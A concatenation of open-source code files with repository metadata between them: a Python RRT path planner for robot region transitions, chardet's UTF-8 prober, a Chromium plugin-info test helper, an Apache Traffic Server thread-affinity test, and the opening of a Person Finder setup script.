self.nextRegionPoly = self.map[self.proj.rfi.regions[next_reg].name]
self.currentRegionPoly = self.map[self.proj.rfi.regions[current_reg].name]
if self.system_print == True:
print "next Region is " + str(self.proj.rfi.regions[next_reg].name)
print "Current Region is " + str(self.proj.rfi.regions[current_reg].name)
#set to zero velocity before tree is generated
self.drive_handler.setVelocity(0, 0)
if last:
transFace = None
else:
# Determine the mid points on the faces connecting to the next region (one goal point will be picked among all the mid points later in buildTree)
transFace = None
q_gBundle = [[],[]] # list of goal points (midpoints of transition faces)
face_normal = [[],[]] # normal of the transition faces
for i in range(len(self.proj.rfi.transitions[current_reg][next_reg])):
pointArray_transface = [x for x in self.proj.rfi.transitions[current_reg][next_reg][i]]
transFace = asarray(map(self.coordmap_map2lab,pointArray_transface))
bundle_x = (transFace[0,0] +transFace[1,0])/2 #mid-point coordinate x
bundle_y = (transFace[0,1] +transFace[1,1])/2 #mid-point coordinate y
q_gBundle = hstack((q_gBundle,vstack((bundle_x,bundle_y))))
#find the normal vector to the face
face = transFace[0,:] - transFace[1,:]
distance_face = norm(face)
normal = face/distance_face * self.trans_matrix
face_normal = hstack((face_normal,vstack((normal[0,0],normal[0,1]))))
if transFace is None:
print "ERROR: Unable to find transition face between regions %s and %s. Please check the decomposition (try viewing projectname_decomposed.regions in RegionEditor or a text editor)." % (self.proj.rfi.regions[current_reg].name, self.proj.rfi.regions[next_reg].name)
# Run algorithm to build the Rapidly-Exploring Random Trees
self.RRT_V = None
self.RRT_E = None
# For plotting
if self.operate_system == 2:
if self.plotting == True:
self.ax.cla()
else:
self.ax = None
else:
self.ax = None
if self.operate_system == 1 and self.plotting == True:
plt.cla()
self.plotMap(self.map)
plt.plot(pose[0],pose[1],'ko')
self.RRT_V,self.RRT_E,self.E_current_column = self.buildTree(\
[pose[0], pose[1]],pose[2],self.currentRegionPoly, self.nextRegionPoly,q_gBundle,face_normal)
"""
# map the lab coordinates back to pixels
V_tosend = array(mat(self.RRT_V[1:,:])).T
V_tosend = map(self.coordmap_lab2map, V_tosend)
V_tosend = mat(V_tosend).T
s = 'RRT:E'+"["+str(list(self.RRT_E[0]))+","+str(list(self.RRT_E[1]))+"]"+':V'+"["+str(list(self.RRT_V[0]))+","+str(list(V_tosend[0]))+","+str(list(V_tosend[1]))+"]"+':T'+"["+str(list(q_gBundle[0]))+","+str(list(q_gBundle[1]))+"]"
#print s
"""
# Run algorithm to find a velocity vector (global frame) to take the robot to the next region
self.Velocity = self.getVelocity([pose[0], pose[1]], self.RRT_V,self.RRT_E)
#self.Node = self.getNode([pose[0], pose[1]], self.RRT_V,self.RRT_E)
self.previous_next_reg = next_reg
# Pass this desired velocity on to the drive handler
self.drive_handler.setVelocity(self.Velocity[0,0], self.Velocity[1,0], pose[2])
#self.drive_handler.setVelocity(self.Node[0,0], self.Node[1,0], pose[2])
RobotPoly = Polygon.Shapes.Circle(self.radius,(pose[0],pose[1]))
# check if robot is inside the current region
departed = not self.currentRegionPoly.overlaps(RobotPoly)
arrived = self.nextRegionPoly.covers(RobotPoly)
if departed and (not arrived) and (time.time()-self.last_warning) > 0.5:
# Figure out what region we think we stumbled into
for r in self.proj.rfi.regions:
pointArray = [self.coordmap_map2lab(x) for x in r.getPoints()]
vertices = mat(pointArray).T
if is_inside([pose[0], pose[1]], vertices):
print "I think I'm in " + r.name
print pose
break
self.last_warning = time.time()
#print "arrived:"+str(arrived)
return arrived
def createRegionPolygon(self,region,hole = None):
"""
This function takes in the region points and make it a Polygon.
"""
if hole == None:
pointArray = [x for x in region.getPoints()]
else:
pointArray = [x for x in region.getPoints(hole_id = hole)]
pointArray = map(self.coordmap_map2lab, pointArray)
regionPoints = [(pt[0],pt[1]) for pt in pointArray]
formedPolygon= Polygon.Polygon(regionPoints)
return formedPolygon
def getVelocity(self,p, V, E, last=False):
"""
This function calculates the velocity for the robot with RRT.
The inputs are (given in order):
p = the current x-y position of the robot
E = edges of the tree (2 x No. of nodes on the tree)
V = points of the tree (2 x No. of vertices)
last = True, if the current region is the last region
= False, if the current region is NOT the last region
"""
pose = mat(p).T
#dis_cur = distance between current position and the next point
dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- pose
heading = E[1,self.E_current_column] # index of the current heading point on the tree
if norm(dis_cur) < 1.5*self.radius: # go to next point
if not heading == shape(V)[1]-1:
self.E_current_column = self.E_current_column + 1
dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- pose
#else:
# dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- vstack((V[1,E[0,self.E_current_column]],V[2,E[0,self.E_current_column]]))
Vel = zeros([2,1])
Vel[0:2,0] = dis_cur/norm(dis_cur)*0.5 #TUNE THE SPEED LATER
return Vel
def getNode(self,p, V, E, last=False):
"""
This function finds the next node on the RRT tree for the robot to head to.
The inputs are (given in order):
p = the current x-y position of the robot
E = edges of the tree (2 x No. of nodes on the tree)
V = points of the tree (2 x No. of vertices)
last = True, if the current region is the last region
= False, if the current region is NOT the last region
"""
pose = mat(p).T
#dis_cur = distance between current position and the next point
dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- pose
heading = E[1,self.E_current_column] # index of the current heading point on the tree
if norm(dis_cur) < 1.5*self.radius: # go to next point
if not heading == shape(V)[1]-1:
self.E_current_column = self.E_current_column + 1
dis_cur = vstack((V[1,E[1,self.E_current_column]],V[2,E[1,self.E_current_column]]))- pose
Node = zeros([2,1])
Node[0,0] = V[1,E[1,self.E_current_column]]
Node[1,0] = V[2,E[1,self.E_current_column]]
#Vel[0:2,0] = dis_cur/norm(dis_cur)*0.5 #TUNE THE SPEED LATER
return Node
def buildTree(self,p,theta,regionPoly,nextRegionPoly,q_gBundle,face_normal, last=False):
"""
This function builds the RRT tree.
p : x,y position of the robot
theta : current orientation of the robot
regionPoly : current region polygon
nextRegionPoly : next region polygon
q_gBundle : coordinates of q_goals that the robot can reach
face_normal : the normal vector of each face corresponding to each goal point in q_gBundle
"""
q_init = mat(p).T
V = vstack((0,q_init))
theta = self.orientation_bound(theta)
V_theta = array([theta])
#!!! CONTROL SPACE: generate a list of omega for random sampling
omegaLowerBound = -math.pi/20 # lower bound for the value of omega
omegaUpperBound = math.pi/20 # upper bound for the value of omega
omegaNoOfSteps = 20
self.omega_range = linspace(omegaLowerBound,omegaUpperBound,omegaNoOfSteps)
self.omega_range_escape = linspace(omegaLowerBound*4,omegaUpperBound*4,omegaNoOfSteps*4) # range used when stuck > stuck_thres
regionPolyOld = Polygon.Polygon(regionPoly)
regionPoly += PolyShapes.Circle(self.radius*2.5,(q_init[0,0],q_init[1,0]))
# check faces of the current region for goal points
E = [[],[]] # the tree matrix
Other = [[],[]]
path = False # if path formed then = 1
stuck = 0 # count for changing the range of sampling omega
append_after_latest_node = False # append new nodes to the latest node
if self.system_print == True:
print "plotting in buildTree is " + str(self.plotting)
if self.plotting == True:
if not plt.isinteractive():
plt.ion()
plt.hold(True)
while not path:
#step -1: try connection to q_goal (generate path to goal)
i = 0
if self.system_print == True:
print "Try Connection to the goal points"
# pushing possible q_goals into the current region (ensure path is covered by the current region polygon)
q_pass = [[],[],[]]
q_pass_dist = []
q_gBundle = mat(q_gBundle)
face_normal = mat(face_normal)
while i < q_gBundle.shape[1]:
q_g_original = q_gBundle[:,i]
q_g = q_gBundle[:,i]+face_normal[:,i]*1.5*self.radius ##original 2*self.radius
#q_g = q_gBundle[:,i]+(q_gBundle[:,i]-V[1:,(shape(V)[1]-1)])/norm(q_gBundle[:,i]-V[1:,(shape(V)[1]-1)])*1.5*self.radius ##original 2*self.radius
if not regionPolyOld.isInside(q_g[0],q_g[1]):
#q_g = q_gBundle[:,i]-(q_gBundle[:,i]-V[1:,(shape(V)[1]-1)])/norm(q_gBundle[:,i]-V[1:,(shape(V)[1]-1)])*1.5*self.radius ##original 2*self.radius
q_g = q_gBundle[:,i]-face_normal[:,i]*1.5*self.radius ##original 2*self.radius
#forming polygon for path checking
EdgePolyGoal = PolyShapes.Circle(self.radius,(q_g[0,0],q_g[1,0])) + PolyShapes.Circle(self.radius,(V[1,shape(V)[1]-1],V[2:,shape(V)[1]-1]))
EdgePolyGoal = PolyUtils.convexHull(EdgePolyGoal)
dist = norm(q_g - V[1:,shape(V)[1]-1])
#check connection to goal
connect_goal = regionPoly.covers(EdgePolyGoal) #check coverage of path from new point to goal
# compare orientation difference
thetaPrev = V_theta[shape(V)[1]-1]
theta_orientation = abs(arctan((q_g[1,0]- V[2,shape(V)[1]-1])/(q_g[0,0]- V[1,shape(V)[1]-1])))
if q_g[1,0] > V[2,shape(V)[1]-1]:
if q_g[0,0] < V[1,shape(V)[1]-1]: # second quadrant
theta_orientation = pi - theta_orientation
elif q_g[0,0] > V[1,shape(V)[1]-1]: # first quadrant
theta_orientation = theta_orientation
elif q_g[1,0] < V[2,shape(V)[1]-1]:
if q_g[0,0] < V[1,shape(V)[1]-1]: #third quadrant
theta_orientation = pi + theta_orientation
elif q_g[0,0] > V[1,shape(V)[1]-1]: # fourth quadrant
theta_orientation = 2*pi - theta_orientation
# check the angle between vector(new goal to goal_original ) and vector( latest node to new goal)
Goal_to_GoalOriginal = q_g_original - q_g
LatestNode_to_Goal = q_g - V[1:,shape(V)[1]-1]
Angle_Goal_LatestNode= arccos(vdot(array(Goal_to_GoalOriginal), array(LatestNode_to_Goal))/norm(Goal_to_GoalOriginal)/norm(LatestNode_to_Goal))
# if connection to goal can be established and the max change in orientation of the robot is smaller than max_angle, tree is said to be completed.
if self.orientation_print == True:
print "theta_orientation is " + str(theta_orientation)
print "thetaPrev is " + str(thetaPrev)
print "(theta_orientation - thetaPrev) is " + str(abs(theta_orientation - thetaPrev))
print "self.max_angle_allowed is " + str(self.max_angle_allowed)
print "abs(theta_orientation - thetaPrev) < self.max_angle_allowed" + str(abs(theta_orientation - thetaPrev) < self.max_angle_allowed)
print"Goal_to_GoalOriginal: " + str( array(Goal_to_GoalOriginal)) + "; LatestNode_to_Goal: " + str( array(LatestNode_to_Goal))
print vdot(array(Goal_to_GoalOriginal), array(LatestNode_to_Goal))
print "Angle_Goal_LatestNode" + str(Angle_Goal_LatestNode)
if connect_goal and (abs(theta_orientation - thetaPrev) < self.max_angle_allowed) and (Angle_Goal_LatestNode < self.max_angle_allowed):
path = True
q_pass = hstack((q_pass,vstack((i,q_g))))
q_pass_dist = hstack((q_pass_dist,dist))
i = i + 1
if self.system_print == True:
print "checked goal points"
self.E = E
self.V = V
# connection to goal has established
# Obtain the closest goal point that path can be formed.
if path:
if shape(q_pass_dist)[0] == 1:
cols = 0
else:
(cols,) = nonzero(q_pass_dist == min(q_pass_dist))
cols = asarray(cols)[0]
q_g = q_pass[1:,cols]
"""
q_g = q_g-(q_gBundle[:,q_pass[0,cols]]-V[1:,(shape(V)[1]-1)])/norm(q_gBundle[:,q_pass[0,cols]]-V[1:,(shape(V)[1]-1)])*3*self.radius #org 3
if not nextRegionPoly.isInside(q_g[0],q_g[1]):
q_g = q_g+(q_gBundle[:,q_pass[0,cols]]-V[1:,(shape(V)[1]-1)])/norm(q_gBundle[:,q_pass[0,cols]]-V[1:,(shape(V)[1]-1)])*6*self.radius #org 3
"""
if self.plotting == True :
if self.operate_system == 1:
plt.suptitle('Rapidly-exploring Random Tree', fontsize=12)
plt.xlabel('x')
plt.ylabel('y')
if shape(V)[1] <= 2:
plt.plot(( V[1,shape(V)[1]-1],q_g[0,0]),( V[2,shape(V)[1]-1],q_g[1,0]),'b')
else:
plt.plot(( V[1,E[0,shape(E)[1]-1]], V[1,shape(V)[1]-1],q_g[0,0]),( V[2,E[0,shape(E)[1]-1]], V[2,shape(V)[1]-1],q_g[1,0]),'b')
plt.plot(q_g[0,0],q_g[1,0],'ko')
plt.figure(1).canvas.draw()
else:
BoundPolyPoints = asarray(PolyUtils.pointList(regionPoly))
self.ax.plot(BoundPolyPoints[:,0],BoundPolyPoints[:,1],'k')
if shape(V)[1] <= 2:
self.ax.plot(( V[1,shape(V)[1]-1],q_g[0,0]),( V[2,shape(V)[1]-1],q_g[1,0]),'b')
else:
self.ax.plot(( V[1,E[0,shape(E)[1]-1]], V[1,shape(V)[1]-1],q_g[0,0]),( V[2,E[0,shape(E)[1]-1]], V[2,shape(V)[1]-1],q_g[1,0]),'b')
self.ax.plot(q_g[0,0],q_g[1,0],'ko')
# trim the path connecting current node to goal point into pieces if the path is too long now
numOfPoint = floor(norm(V[1:,shape(V)[1]-1]- q_g)/self.step_size)
if numOfPoint < 3:
numOfPoint = 3
x = linspace( V[1,shape(V)[1]-1], q_g[0,0], numOfPoint )
y = linspace( V[2,shape(V)[1]-1], q_g[1,0], numOfPoint )
for i in range(x.shape[0]):
if i != 0:
V = hstack((V,vstack((shape(V)[1],x[i],y[i]))))
E = hstack((E,vstack((shape(V)[1]-2,shape(V)[1]-1))))
#push the goal point to the next region
q_g = q_g+face_normal[:,q_pass[0,cols]]*3*self.radius ##original 2*self.radius
if not nextRegionPoly.isInside(q_g[0],q_g[1]):
q_g = q_g-face_normal[:,q_pass[0,cols]]*6*self.radius ##original 2*self.radius
V = hstack((V,vstack((shape(V)[1],q_g[0,0],q_g[1,0]))))
E = hstack((E,vstack((shape(V)[1]-2 ,shape(V)[1]-1))))
if self.plotting == True :
if self.operate_system == 1:
plt.plot(q_g[0,0],q_g[1,0],'ko')
plt.plot(( V[1,shape(V)[1]-1],V[1,shape(V)[1]-2]),( V[2,shape(V)[1]-1],V[2,shape(V)[1]-2]),'b')
plt.figure(1).canvas.draw()
else:
self.ax.plot(q_g[0,0],q_g[1,0],'ko')
self.ax.plot(( V[1,shape(V)[1]-1],V[1,shape(V)[1]-2]),( V[2,shape(V)[1]-1],V[2,shape(V)[1]-2]),'b')
# path is not formed, try to append points onto the tree
if not path:
# connection_to_tree : connection to the tree is successful
if append_after_latest_node:
V,V_theta,E,Other,stuck,append_after_latest_node, connection_to_tree = self.generateNewNode(V,V_theta,E,Other,regionPoly,stuck, append_after_latest_node)
else:
connection_to_tree = False
while not connection_to_tree:
V,V_theta,E,Other,stuck,append_after_latest_node, connection_to_tree = self.generateNewNode (V,V_theta,E,Other,regionPoly,stuck)
if self.finish_print:
print 'Here is the V matrix:', V, 'Here is the E matrix:',E
print >>sys.__stdout__, 'Here is the V matrix:\n', V, '\nHere is the E matrix:\n',E
#B: trim to a single path
single = 0
while single == 0:
trim = 0
for j in range(shape(V)[1]-3):
(row,col) = nonzero(E == j+1)
if len(col) == 1:
E = delete(E, col[0], 1)
trim = 1
if trim == 0:
single = 1;
####print with matlib
if self.plotting ==True :
if self.operate_system == 1:
plt.plot(V[1,:],V[2,:],'b')
for i in range(shape(E)[1]):
plt.text(V[1,E[0,i]],V[2,E[0,i]], V[0,E[0,i]], fontsize=12)
plt.text(V[1,E[1,i]],V[2,E[1,i]], V[0,E[1,i]], fontsize=12)
plt.figure(1).canvas.draw()
else:
BoundPolyPoints = asarray(PolyUtils.pointList(regionPoly))
self.ax.plot(BoundPolyPoints[:,0],BoundPolyPoints[:,1],'k')
self.ax.plot(V[1,:],V[2,:],'b')
for i in range(shape(E)[1]):
self.ax.text(V[1,E[0,i]],V[2,E[0,i]], V[0,E[0,i]], fontsize=12)
self.ax.text(V[1,E[1,i]],V[2,E[1,i]], V[0,E[1,i]], fontsize=12)
#return V, E, and the current node number on the tree
V = array(V)
return V, E, 0
def generateNewNode(self,V,V_theta,E,Other,regionPoly,stuck,append_after_latest_node =False):
"""
Generate a new node on the current tree matrix
V : the node matrix
V_theta : the orientation matrix
E : the tree matrix (or edge matrix)
Other : the matrix containing the velocity and angular velocity(omega) information
regionPoly: the polygon of current region
stuck : count on the number of times failed to generate new node
append_after_latest_node : append new nodes to the latest node (True only if the previous node addition is successful)
"""
if self.system_print == True:
print "In control space generating path,stuck = " + str(stuck)
connection_to_tree = False # True when connection to the tree is successful
if stuck > self.stuck_thres:
# increase the range of omega since path cannot be generated
omega = random.choice(self.omega_range_escape)
else:
#!!!! CONTROL SPACE STEP 1 - generate random omega
omega = random.choice(self.omega_range)
#!!!! CONTROL SPACE STEP 2 - pick a random point on the tree
if append_after_latest_node:
tree_index = shape(V)[1]-1
else:
if random.choice([1,2]) == 1:
tree_index = random.choice(array(V[0])[0])
else:
tree_index = shape(V)[1]-1
xPrev = V[1,tree_index]
yPrev = V[2,tree_index]
thetaPrev = V_theta[tree_index]
j = 1
#!!!! CONTROL SPACE STEP 3 - Check path of the robot
path_robot = PolyShapes.Circle(self.radius,(xPrev,yPrev))
while j <= self.timeStep:
xOrg = xPrev
yOrg = yPrev
xPrev = xPrev + self.velocity/omega*(sin(omega* 1 + thetaPrev)-sin(thetaPrev))
yPrev = yPrev - self.velocity/omega*(cos(omega* 1 + thetaPrev)-cos(thetaPrev))
thetaPrev = omega* 1 + thetaPrev
path_robot = path_robot + PolyShapes.Circle(self.radius,(xPrev,yPrev))
j = j + 1
thetaPrev = self.orientation_bound(thetaPrev)
path_all = PolyUtils.convexHull(path_robot)
in_bound = regionPoly.covers(path_all)
"""
# plotting
if plotting == True:
self.plotPoly(path_all,'r',1)
"""
stuck = stuck + 1
if in_bound:
robot_new_node = PolyShapes.Circle(self.radius,(xPrev,yPrev))
# check how many nodes on the tree does the new node overlaps with
nodes_overlap_count = 0
for k in range(shape(V)[1]-1):
robot_old_node = PolyShapes.Circle(self.radius,(V[1,k],V[2,k]))
if robot_new_node.overlaps(robot_old_node):
if abs(thetaPrev - V_theta[k]) < self.max_angle_overlap:
nodes_overlap_count += 1
if nodes_overlap_count == 0 or (stuck > self.stuck_thres+1 and nodes_overlap_count < 2) or (stuck > self.stuck_thres+500):
if stuck > self.stuck_thres+1:
append_after_latest_node = False
if (stuck > self.stuck_thres+500):
stuck = 0
stuck = stuck - 20
# plotting
if self.plotting == True:
self.plotPoly(path_all,'b',1)
if self.system_print == True:
print "node connected"
V = hstack((V,vstack((shape(V)[1],xPrev,yPrev))))
V_theta = hstack((V_theta,thetaPrev))
E = hstack((E,vstack((tree_index ,shape(V)[1]-1))))
Other = hstack((Other,vstack((self.velocity,omega))))
##################### E should add omega and velocity
connection_to_tree = True
append_after_latest_node = True
else:
append_after_latest_node = False
if self.system_print == True:
print "node not connected. check goal point"
else:
append_after_latest_node = False
return V,V_theta,E,Other,stuck,append_after_latest_node, connection_to_tree
def orientation_bound(self,theta):
"""
make sure the returned angle is between 0 to 2*pi
"""
while theta > 2*pi or theta < 0:
if theta > 2*pi:
theta = theta - 2*pi
else:
theta = theta + 2*pi
return theta
def plotMap(self,mappedRegions):
"""
Plotting regions and obstacles with matplotlib.pyplot
number: figure number (see on top)
"""
#if not plt.isinteractive():
# plt.ion()
#plt.hold(True)
if self.operate_system == 1:
for regionName,regionPoly in mappedRegions.iteritems():
self.plotPoly(regionPoly,'k')
plt.figure(1).canvas.draw()
def plotPoly(self,c,string,w = 1):
"""
Plot polygons inside the boundary
c = polygon to be plotted with matlabplot
string = string that specify color
w = width of the line plotting
"""
if bool(c):
for i in range(len(c)):
#toPlot = Polygon.Polygon(c.contour(i))
toPlot = Polygon.Polygon(c.contour(i)) & self.all
if bool(toPlot):
for j in range(len(toPlot)):
#BoundPolyPoints = asarray(PolyUtils.pointList(toPlot.contour(j)))
BoundPolyPoints = asarray(PolyUtils.pointList(Polygon.Polygon(toPlot.contour(j))))
if self.operate_system == 2:
self.ax.plot(BoundPolyPoints[:,0],BoundPolyPoints[:,1],string,linewidth=w)
self.ax.plot([BoundPolyPoints[-1,0],BoundPolyPoints[0,0]],[BoundPolyPoints[-1,1],BoundPolyPoints[0,1]],string,linewidth=w)
else:
plt.plot(BoundPolyPoints[:,0],BoundPolyPoints[:,1],string,linewidth=w)
plt.plot([BoundPolyPoints[-1,0],BoundPolyPoints[0,0]],[BoundPolyPoints[-1,1],BoundPolyPoints[0,1]],string,linewidth=w)
plt.figure(1).canvas.draw()
def data_gen(self):
#self.ax.cla()
for regionName,regionPoly in self.map.iteritems():
self.plotPoly(regionPoly,'k')
"""
#for i in range(len(self.V)):
if shape(V)[1] <= 2:
plt.plot(( V[1,shape(V)[1]-1],q_g[0,0]),( V[2,shape(V)[1]-1],q_g[1,0]),'b')
else:
plt.plot(( V[1,E[0,shape(E)[1]-1]], V[1,shape(V)[1]-1],q_g[0,0]),( V[2,E[0,shape(E)[1]-1]], V[2,shape(V)[1]-1],q_g[1,0]),'b')
self.plotPoly(self.realRobot, 'r')
self.plotPoly(self.robot, 'b')
"""
pose = self.pose_handler.getPose()
self.ax.plot(pose[0],pose[1],'bo')
"""
self.ax.plot(self.q_g[0],self.q_g[1],'ro')
self.plotPoly(self.overlap,'g')
self.plotPoly(self.m_line,'b')
"""
yield(pose[0],pose[1])
"""
self.ax.plot(self.prev_follow[0],self.prev_follow[1],'ko')
"""
def jplot(self):
ani = animation.FuncAnimation(self.fig, self.scope.update, self.data_gen)
plt.show()
class _Scope:
def __init__(self, ax, motion, maxt=2, dt=0.02):
self.i = 0
self.ax = ax
self.line, = self.ax.plot(1)
self.ax.set_ylim(0, 1)
self.motion = motion
def update(self,data):
(data1) = self.motion.data_gen()
a = data1.next()
self.line.set_data(a)
self.ax.relim()
self.ax.autoscale()
return self.line,
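# Illustrative helper (not used by the handlers above): one closed-form
# integration step of the unicycle model that generateNewNode samples in
# control space. For constant speed v and turning rate omega over a step dt,
#     x' = x + v/omega * (sin(omega*dt + theta) - sin(theta))
#     y' = y - v/omega * (cos(omega*dt + theta) - cos(theta))
#     theta' = theta + omega*dt
# which is the exact integral of dx = v*cos(theta), dy = v*sin(theta),
# dtheta = omega, valid for non-zero omega.
def _unicycle_step(x, y, theta, v, omega, dt=1.0):
    x_new = x + v/omega*(sin(omega*dt + theta) - sin(theta))
    y_new = y - v/omega*(cos(omega*dt + theta) - cos(theta))
    return x_new, y_new, (theta + omega*dt) % (2*pi)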
|
gpl-3.0
|
pechatny/basic-flask-app
|
src/app/flask/lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/utf8prober.py
|
2919
|
2652
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from . import constants
from .charsetprober import CharSetProber
from .codingstatemachine import CodingStateMachine
from .mbcssm import UTF8SMModel
ONE_CHAR_PROB = 0.5
class UTF8Prober(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(UTF8SMModel)
self.reset()
def reset(self):
CharSetProber.reset(self)
self._mCodingSM.reset()
self._mNumOfMBChar = 0
def get_charset_name(self):
return "utf-8"
def feed(self, aBuf):
for c in aBuf:
codingState = self._mCodingSM.next_state(c)
if codingState == constants.eError:
self._mState = constants.eNotMe
break
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == constants.eStart:
if self._mCodingSM.get_current_charlen() >= 2:
self._mNumOfMBChar += 1
if self.get_state() == constants.eDetecting:
if self.get_confidence() > constants.SHORTCUT_THRESHOLD:
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
unlike = 0.99
if self._mNumOfMBChar < 6:
for i in range(0, self._mNumOfMBChar):
unlike = unlike * ONE_CHAR_PROB
return 1.0 - unlike
else:
return unlike
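def _utf8_confidence_demo():
    """Illustrative helper, not part of chardet: the confidence formula above
    is 1 - 0.99 * ONE_CHAR_PROB**n for fewer than 6 multi-byte sequences, so
    confidence rises quickly with each multi-byte UTF-8 character seen."""
    values = [1.0 - 0.99 * (ONE_CHAR_PROB ** n) for n in range(6)]
    return values  # [0.01, 0.505, 0.7525, 0.87625, 0.938125, 0.9690625]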
|
mit
|
yinquan529/platform-external-chromium_org
|
chrome/test/pyautolib/plugins_info.py
|
69
|
3510
|
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Python representation for Chromium Plugins info.
This is the info available at about:plugins.
Obtain one of these from PyUITestSuite::GetPluginsInfo() call.
Example:
class MyTest(pyauto.PyUITest):
def testBasic(self):
info = self.GetPluginsInfo() # fetch plugins snapshot
print info.Plugins()
See more examples in chrome/test/functional/plugins.py.
"""
import simplejson as json
from pyauto_errors import JSONInterfaceError
class PluginsInfo(object):
"""Represent info for Chromium plugins.
The info is represented as a list of dictionaries, one for each plugin.
"""
def __init__(self, plugins_dict):
"""Initialize a PluginsInfo from a json string.
Args:
plugins_dict: a dictionary returned by the automation command
'GetPluginsInfo'.
Raises:
pyauto_errors.JSONInterfaceError if the automation call returns an error.
"""
# JSON string prepared in GetPluginsInfo() in automation_provider.cc
self.pluginsdict = plugins_dict
if self.pluginsdict.has_key('error'):
raise JSONInterfaceError(self.pluginsdict['error'])
def Plugins(self):
"""Get plugins.
Returns:
a list of plugins info
Sample:
[ { u'desc': u'Shockwave Flash 10.0 r45',
u'enabled': True,
u'mimeTypes': [ { u'description': u'Shockwave Flash',
u'fileExtensions': [u'swf'],
u'mimeType': u'application/x-shockwave-flash'},
{ u'description': u'FutureSplash Player',
u'fileExtensions': [u'spl'],
u'mimeType': u'application/futuresplash'}],
u'name': u'Shockwave Flash',
u'path': u'/Library/Internet Plug-Ins/Flash Player.plugin',
u'version': u'10.0.45.2'},
{ u'desc': u'Version 1.1.2.9282',
u'enabled': True,
u'mimeTypes': [ { u'description': u'Google voice and video chat',
u'fileExtensions': [u'googletalk'],
u'mimeType': u'application/googletalk'}],
u'name': u'Google Talk NPAPI Plugin',
u'path': u'/Library/Internet Plug-Ins/googletalkbrowserplugin.plugin',
u'version': u'1.1.2.9282'},
...,
...,
]
"""
return self.pluginsdict.get('plugins', [])
def PluginForPath(self, path):
"""Get plugin info for the given plugin path.
Returns:
a dictionary of info for the plugin.
"""
got = filter(lambda x: x['path'] == path, self.Plugins())
if not got: return None
return got[0]
def PluginForName(self, name):
"""Get plugin info for the given name.
There might be several plugins with the same name.
Args:
name: the name for which to look for.
Returns:
a list of info dictionaries for each plugin found with the given name.
"""
return filter(lambda x: x['name'] == name, self.Plugins())
def FirstPluginForName(self, name):
"""Get plugin info for the first plugin with the given name.
This is useful in case there are multiple plugins for a name.
Args:
name: the name for which to look for.
Returns:
a plugin info dictionary
None, if not found
"""
all = self.PluginForName(name)
if not all: return None
return all[0]
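def _plugins_info_demo():
    """Illustrative helper, not part of pyauto: constructing PluginsInfo from
    an already-fetched dictionary (normally returned by GetPluginsInfo) and
    querying it by name."""
    info = PluginsInfo({'plugins': [
        {'name': 'Shockwave Flash',
         'path': '/Library/Internet Plug-Ins/Flash Player.plugin',
         'enabled': True}]})
    flash = info.FirstPluginForName('Shockwave Flash')
    return flash['path'] if flash else None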
|
bsd-3-clause
|
vmamidi/trafficserver
|
tests/gold_tests/cont_schedule/thread_affinity.test.py
|
6
|
1791
|
'''
'''
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
Test.Summary = 'Test TSContThreadAffinity APIs'
Test.ContinueOnFail = True
# Define default ATS
ts = Test.MakeATSProcess('ts')
Test.testName = 'Test TSContThreadAffinity APIs'
ts.Disk.records_config.update({
'proxy.config.exec_thread.autoconfig': 0,
'proxy.config.exec_thread.autoconfig.scale': 1.5,
'proxy.config.exec_thread.limit': 32,
'proxy.config.accept_threads': 1,
'proxy.config.task_threads': 2,
'proxy.config.diags.debug.enabled': 1,
'proxy.config.diags.debug.tags': 'TSContSchedule_test'
})
# Load plugin
Test.PrepareTestPlugin(os.path.join(Test.Variables.AtsTestPluginsDir, 'cont_schedule.so'), ts, 'affinity')
# www.example.com Host
tr = Test.AddTestRun()
tr.Processes.Default.Command = 'printf "Test TSContThreadAffinity API"'
tr.Processes.Default.ReturnCode = 0
tr.Processes.Default.StartBefore(ts)
ts.Streams.All = "gold/thread_affinity.gold"
ts.Streams.All += Testers.ExcludesExpression('fail', 'should not contain "fail"')
|
apache-2.0
|
gauribhoite/personfinder
|
tools/setup_pf.py
|
4
|
8995
|
# Copyright 2009-2010 by Ka-Ping Yee
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
import const
from model import *
from utils import *
def setup_datastore():
"""Sets up the subject types and translations in a datastore. (Existing
